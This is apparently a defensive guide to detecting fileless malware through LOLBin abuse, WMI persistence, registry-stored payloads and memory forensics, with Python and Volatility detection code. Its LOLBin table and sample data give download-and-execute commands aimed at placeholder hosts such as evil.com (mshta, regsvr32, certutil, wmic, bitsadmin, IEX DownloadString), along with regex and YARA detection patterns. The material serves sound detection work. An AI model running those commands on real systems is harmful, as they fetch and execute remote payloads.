detecting-fileless-malware-techniques

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.


# Detecting Fileless Malware Techniques

## When to Use

- EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
- Investigating attacks that leave no traditional malware files on disk
- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
- Memory forensics reveals malicious code but no corresponding files exist on the filesystem

**Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.

## Prerequisites

- Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
- PowerShell Script Block Logging and Module Logging enabled
- Volatility 3 for memory forensics of fileless malware artifacts
- Process Monitor (ProcMon) for real-time system activity monitoring
- Windows Event Log access with adequate retention policies
- Autoruns for identifying persistence mechanisms

## Workflow

### Step 1: Identify LOLBin Usage

Detect abuse of legitimate Windows binaries for malicious purposes:

```
Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
  Abuse: Execute HTA files with embedded VBScript/JScript
  Example: mshta http://evil.com/payload.hta
  Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""")
  Detect: mshta.exe with URL argument or vbscript: prefix

regsvr32.exe:
  Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo"
  Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
  Detect: regsvr32.exe with /i: URL parameter

certutil.exe:
  Abuse: Download files, decode Base64
  Example: certutil -urlcache -split -f http://evil.com/payload.exe
  Example: certutil -decode encoded.txt payload.exe
  Detect: certutil.exe with -urlcache or -decode arguments

rundll32.exe:
  Abuse: Execute DLL functions, JavaScript
  Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
  Detect: rundll32.exe with javascript: argument

wmic.exe:
  Abuse: Execute code via XSL stylesheets
  Example: wmic process get brief /format:"http://evil.com/payload.xsl"
  Detect: wmic.exe with /format: URL parameter

bitsadmin.exe:
  Abuse: Download files via BITS
  Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe
  Detect: bitsadmin.exe with /transfer or /addfile to external URL

cmstp.exe:
  Abuse: Execute commands via INF file
  Example: cmstp.exe /ni /s payload.inf
  Detect: cmstp.exe execution from non-standard locations
```
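The "Detect:" lines in the table above, turned into a small command-line classifier as an added example (not part of the original skill): each rule is a regex over a Sysmon Event ID 1 `CommandLine` value, and `-EncodedCommand` payloads are decoded from their Base64/UTF-16LE form so the analyst can see what the PowerShell one-liner actually runs. The sample command lines are constructed for the demonstration; the cmstp rule is narrowed to the `/ni /s <file>.inf` form shown in the table.

```python
import base64
import re

# Detection regexes derived from the LOLBin table above (one "Detect:" line each).
# The cmstp rule is narrowed to the /ni /s <file>.inf invocation shown in the table.
LOLBIN_RULES = [
    ("mshta_remote_or_script", r"\bmshta(\.exe)?\b.*?(https?://|vbscript:|javascript:)"),
    ("regsvr32_squiblydoo",    r"\bregsvr32(\.exe)?\b.*?/i:\s*https?://.*?scrobj\.dll"),
    ("certutil_download",      r"\bcertutil(\.exe)?\b.*?-urlcache\b"),
    ("certutil_decode",        r"\bcertutil(\.exe)?\b.*?-decode\b"),
    ("rundll32_javascript",    r"\brundll32(\.exe)?\b.*?javascript:"),
    ("wmic_remote_xsl",        r"\bwmic(\.exe)?\b.*?/format:\"?https?://"),
    ("bitsadmin_download",     r"\bbitsadmin(\.exe)?\b.*?/(transfer|addfile)\b.*?https?://"),
    ("cmstp_inf",              r"\bcmstp(\.exe)?\b.*?/ni\b.*?\.inf\b"),
    ("powershell_encoded",     r"\bpowershell(\.exe)?\b.*?\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"),
]
# -EncodedCommand accepts any unambiguous prefix; the payload is Base64 of UTF-16LE text
ENC_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None

def classify(cmdline):
    """Return the LOLBin rules a command line matches plus any decoded payload."""
    hits = [name for name, rx in LOLBIN_RULES if re.search(rx, cmdline, re.IGNORECASE)]
    return {"rules": hits, "decoded": decode_encoded_command(cmdline)}

# Constructed Sysmon EID 1 CommandLine values for demonstration, not real telemetry
SAMPLE_CMDLINES = [
    "mshta.exe http://example.invalid/payload.hta",
    "regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
    "certutil -urlcache -split -f http://example.invalid/payload.exe",
    "powershell.exe -NoP -W Hidden -enc "
    + base64.b64encode("Write-Host hi".encode("utf-16-le")).decode(),
    r"regsvr32 /s C:\Windows\System32\msxml3.dll",   # benign registration
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        verdict = classify(line)
        flag = "[!]" if verdict["rules"] else "[ ]"
        print(flag, line[:60], verdict["rules"], verdict["decoded"])
```

The regexes are deliberately narrow (a URL or script: prefix, not mere execution of the binary), which keeps the benign `regsvr32` registration in the sample set unflagged.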

### Step 2: Detect WMI-Based Persistence

Analyze WMI event subscriptions used for fileless persistence:

```powershell
# List WMI event subscriptions (filters, consumers, bindings) with wmic
wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list
wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list
wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list
wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list

# PowerShell enumeration of the same classes
# (Get-WmiObject is deprecated; Get-CimInstance -Namespace root\Subscription -ClassName ... is the modern equivalent)
Get-WmiObject -Namespace root\Subscription -Class __EventFilter
Get-WmiObject -Namespace root\Subscription -Class CommandLineEventConsumer
Get-WmiObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding
```

```python
# Parse Sysmon WMI events (Event ID 19 = filter, 20 = consumer, 21 = binding)
import subprocess
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
QUERY = "*[System[EventID=19 or EventID=20 or EventID=21]]"

# Pull the first 50 matching events from the Sysmon channel as XML
# (add "/rd:true" to read newest first)
result = subprocess.run(
    ["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational",
     f"/q:{QUERY}", "/f:xml", "/c:50"],
    capture_output=True, text=True, check=True,
)

# wevtutil emits the records back to back; split on the closing tag of each <Event>
for chunk in result.stdout.split("</Event>"):
    if not chunk.strip():
        continue
    try:
        root = ET.fromstring(chunk + "</Event>")
    except ET.ParseError:
        continue                      # trailing fragment or truncated record
    eid_el = root.find("./e:System/e:EventID", NS)
    if eid_el is None:
        continue
    eid = eid_el.text
    # Flatten <Data Name="..."> elements into a dict; missing text becomes ""
    data = {d.get("Name"): (d.text or "") for d in root.findall("./e:EventData/e:Data", NS)}

    if eid == "19":
        print(f"[!] WMI Filter Created: {data.get('Name')}")
        print(f"    Query: {data.get('Query')}")
    elif eid == "20":
        print(f"[!] WMI Consumer Created: {data.get('Name')}")
        print(f"    Type: {data.get('Type')}")
        print(f"    Destination: {data.get('Destination')}")
    elif eid == "21":
        print("[!] WMI Binding Created")
        print(f"    Consumer: {data.get('Consumer')}")
        print(f"    Filter: {data.get('Filter')}")
```
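The parser above prints filters, consumers and bindings as separate events; a persistence chain only becomes obvious once the EID 21 binding is joined back to its filter and consumer. The following correlator is an added example (not part of the original skill) that does that join over a constructed set of already-flattened Sysmon records and scores each chain: a code-executing consumer class, script or LOLBin keywords in the consumer's command text, or a binding whose filter or consumer was never logged. The second chain in the sample is the SCM Event Log binding present on a default Windows install, which should score clean; the `Destination` field is assumed to hold the consumer's command or script text as Sysmon logs it.

```python
import re

# Constructed Sysmon WMI events (EID 19/20/21) flattened to dicts as the parser above produces;
# not real telemetry. The second chain is the SCM Event Log binding present by default on Windows.
WMI_EVENTS = [
    {"EventID": "19", "Name": "SysUpdateFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": "20", "Name": "SysUpdateConsumer", "Type": "Command Line",
     "Destination": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s.ps1')\""},
    {"EventID": "21", "Filter": '__EventFilter.Name="SysUpdateFilter"',
     "Consumer": 'CommandLineEventConsumer.Name="SysUpdateConsumer"'},
    {"EventID": "19", "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": "20", "Name": "SCM Event Log Consumer", "Type": "NT Event Log", "Destination": ""},
    {"EventID": "21", "Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
]

REF_RE = re.compile(r'^(\w+)\.Name="([^"]*)"')   # Sysmon binding reference: <Class>.Name="<name>"
EXECUTING_CONSUMERS = ("CommandLineEventConsumer", "ActiveScriptEventConsumer")
PAYLOAD_KEYWORDS = ("powershell", "-enc", "iex", "invoke-expression", "downloadstring",
                    "mshta", "wscript", "cscript", "regsvr32", "rundll32", "cmd.exe")

def parse_ref(ref):
    m = REF_RE.match(ref)
    return (m.group(1), m.group(2)) if m else (None, ref)

def correlate(events):
    """Join each EID 21 binding to its filter and consumer and score the chain."""
    filters = {e["Name"]: e for e in events if e["EventID"] == "19"}
    consumers = {e["Name"]: e for e in events if e["EventID"] == "20"}
    chains = []
    for e in (x for x in events if x["EventID"] == "21"):
        _, fname = parse_ref(e["Filter"])
        ctype, cname = parse_ref(e["Consumer"])
        flt, con = filters.get(fname, {}), consumers.get(cname, {})
        payload = con.get("Destination") or ""   # assumed: Sysmon puts the command/script text here
        reasons = []
        if ctype in EXECUTING_CONSUMERS:
            reasons.append(f"code-executing consumer class {ctype}")
        if any(k in payload.lower() for k in PAYLOAD_KEYWORDS):
            reasons.append("payload contains script/LOLBin keywords")
        if not flt or not con:
            reasons.append("binding references a filter or consumer never logged")
        chains.append({"filter": fname, "query": flt.get("Query"), "consumer": cname,
                       "consumer_type": ctype, "payload": payload or None,
                       "suspicious": bool(reasons), "reasons": reasons})
    return chains
```

Feeding `correlate()` the dicts collected by the parser above (with `EventID` added to each) gives one scored record per binding, which is the unit an analyst actually triages.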

### Step 3: Detect Registry-Resident Payloads

Find malicious code stored in the Windows Registry:

```cmd
REM Common registry locations for fileless payloads
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKCU\Environment" /s

REM Check for PowerShell encoded commands in registry values
REM Malware stores Base64-encoded payloads in custom registry keys
reg query "HKCU\Software" /s /f "powershell" 2>nul
reg query "HKCU\Software" /s /f "-enc" 2>nul

REM Check for large registry values (possible stored payloads): python scan_registry.py
```

```python
# scan_registry.py: flag large Base64-looking or PowerShell-bearing string values
# under HKCU\Software and HKLM\Software (three levels deep)
import base64
import binascii
import winreg

SUSPICIOUS_ROOTS = [
    (winreg.HKEY_CURRENT_USER, r"Software"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software"),
]
KEYWORDS = ("powershell", "invoke", "iex", "-enc")

def looks_like_base64(value):
    # validate=True is essential: without it b64decode silently discards
    # non-alphabet characters and "succeeds" on almost any text
    try:
        base64.b64decode(value[:100], validate=True)
        return True
    except (binascii.Error, ValueError):
        return False

def scan_registry(hive, path, depth=0):
    if depth > 3:
        return
    try:
        key = winreg.OpenKey(hive, path)
    except OSError:              # access denied or key removed mid-scan
        return
    with key:
        i = 0
        while True:
            try:
                name, value, _vtype = winreg.EnumValue(key, i)
            except OSError:      # no more values
                break
            i += 1
            if not isinstance(value, str):
                continue
            if len(value) > 500 and looks_like_base64(value):
                print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} chars)")
            # Keyword check on every string value, not only large ones:
            # a short Run-key launcher is just as relevant as a stored blob
            if any(kw in value.lower() for kw in KEYWORDS):
                print(f"[!] PowerShell in registry: {path}\\{name}")
        # Recurse into subkeys
        j = 0
        while True:
            try:
                subkey = winreg.EnumKey(key, j)
            except OSError:      # no more subkeys
                break
            j += 1
            scan_registry(hive, f"{path}\\{subkey}", depth + 1)

if __name__ == "__main__":
    for hive, path in SUSPICIOUS_ROOTS:
        scan_registry(hive, path)
```

### Step 4: Analyze Memory for Fileless Artifacts

Use memory forensics to find in-memory-only malware:

```bash
# Processes with injected code (executable private memory with no backing file)
vol3 -f memory.dmp windows.malfind

# Executable VADs of a suspect process (PID 4012 is an example); .NET assemblies
# loaded through reflection have no file mapping behind them
vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE"

# PowerShell processes and their command lines (CLR hosting points to .NET reflection loading)
vol3 -f memory.dmp windows.cmdline | grep -i "powershell"

# Scan for strings typical of fileless PowerShell frameworks; the rule lives in a file
# so the YARA syntax ($ and quotes) does not have to be escaped for the shell
cat > fileless.yar << 'EOF'
rule Fileless_PowerShell {
    strings:
        $s1 = "System.Reflection.Assembly" ascii wide
        $s2 = "[System.Convert]::FromBase64String" ascii wide
        $s3 = "Invoke-Expression" ascii wide
        $s4 = "DownloadString" ascii wide
    condition:
        2 of them
}
EOF
vol3 -f memory.dmp yarascan.YaraScan --yara-file fileless.yar

# Recover PowerShell activity: windows.cmdline gives process command lines, while strings
# catches script fragments that only ever existed in memory (add "strings -e l" for UTF-16LE text)
vol3 -f memory.dmp windows.cmdline
strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-enc"
```
